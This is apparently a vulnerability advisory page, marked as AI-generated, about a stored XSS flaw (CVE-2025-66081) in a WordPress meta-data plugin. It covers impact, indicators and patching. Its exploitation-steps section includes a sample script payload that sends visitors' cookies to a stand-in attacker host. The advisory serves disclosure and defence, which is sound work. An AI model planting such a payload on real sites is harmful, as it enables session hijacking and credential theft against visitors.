CVE-2025-66081
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-66081 is a Stored Cross-Site Scripting (XSS) vulnerability in the WordPress Head Meta Data plugin by Jeff Starr. It affects all versions up to and including 20250327, and was patched in version 20251118. The vulnerability was reported by researcher Jitlada on November 14, 2025, and publicly disclosed on December 14, 2025. It carries a CVSS v3.1 base score of 5.4 (Medium) per NVD, and 5.9 (Medium) per Patchstack (Patchstack).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically of the stored (persistent) variant. An attacker with Author-level or higher privileges can inject malicious scripts into meta data fields managed by the plugin; these scripts are then stored in the database and rendered in the HTML output of affected pages, executing in the browsers of site visitors. Exploitation requires no special configuration beyond having a contributor or author account on the target WordPress site, and user interaction is required on the victim's side for the payload to execute (Patchstack).

Impact

Successful exploitation allows an attacker to inject and persistently store malicious JavaScript or HTML payloads within the WordPress site's head meta data, which executes in the browsers of any visitor viewing affected pages. This can lead to session hijacking, credential theft, malicious redirects, defacement, or delivery of drive-by malware to site visitors. The confidentiality and integrity impacts are low-to-moderate, with no direct availability impact; however, the persistent nature of the payload means all site visitors are at risk until the malicious content is removed (Patchstack).

Exploitability

No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported for CVE-2025-66081. The EPSS score is approximately 0.034% (0.000340), indicating a very low probability of exploitation in the near term. Patchstack rates this as low priority and notes it is unlikely to be exploited, though it acknowledges that XSS vulnerabilities of this class are sometimes used in mass-exploit campaigns targeting WordPress plugins at scale. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Patchstack).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Head Meta Data plugin at version 20250327 or earlier using tools like WPScan or by inspecting plugin directories.
  2. Obtain Author/Developer Access: Acquire or compromise an account with at least Author-level privileges on the target WordPress site (e.g., via credential stuffing, phishing, or brute force).
  3. Inject Malicious Payload: Navigate to the Head Meta Data plugin settings or a post/page editor where meta data fields are configurable, and insert a malicious script payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a vulnerable meta data field.
  4. Payload Persistence: Submit/save the form; the malicious script is stored in the WordPress database and associated with the affected page or site-wide head meta output.
  5. Victim Execution: When any visitor loads a page that renders the injected meta data, the malicious script executes in their browser, enabling session hijacking, credential theft, or redirection to attacker-controlled infrastructure (Patchstack).

Indicators of compromise

  • Database: Unexpected or obfuscated JavaScript (<script>, onerror=, javascript:, base64-encoded strings) stored in WordPress post meta or options table entries associated with the Head Meta Data plugin.
  • Logs: WordPress admin logs or server access logs showing unusual POST requests to plugin settings pages or post editor endpoints from unfamiliar IP addresses or user accounts.
  • Network: Outbound requests from site visitors' browsers to unknown or suspicious external domains (e.g., cookie-stealing endpoints) originating from pages that include head meta data output.
  • File System: No direct file-system artifacts expected for a stored XSS; however, review the wp_options or wp_postmeta tables for injected script content.

Mitigation and workarounds

The vendor has released a patched version of the Head Meta Data plugin: version 20251118. All site administrators running version 20250327 or earlier should update immediately via the WordPress plugin dashboard or by downloading the latest release. If an immediate update is not possible, consider temporarily deactivating the plugin and restricting Author/Editor-level access to trusted users only. Patchstack users can enable auto-update for vulnerable plugins as an additional safeguard (Patchstack).

Community reactions

The vulnerability was covered in Wordfence's weekly WordPress vulnerability report for December 8–14, 2025, as part of routine plugin security tracking. Patchstack, which coordinated the disclosure, rates the issue as low priority with no impactful threat. No significant independent researcher commentary or broader media coverage has been identified beyond standard vulnerability database entries.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-18044NONEN/A
  • estatik
NoYesAug 12, 2026
CVE-2026-17008NONEN/A
  • quick-paypal-payments
NoNoAug 12, 2026
CVE-2026-16990NONEN/A
  • wp-paypal
NoNoAug 12, 2026
CVE-2026-16747NONEN/A
  • kirki
NoYesAug 12, 2026
CVE-2026-16621NONEN/A
  • woo-paypal-gateway
NoYesAug 12, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management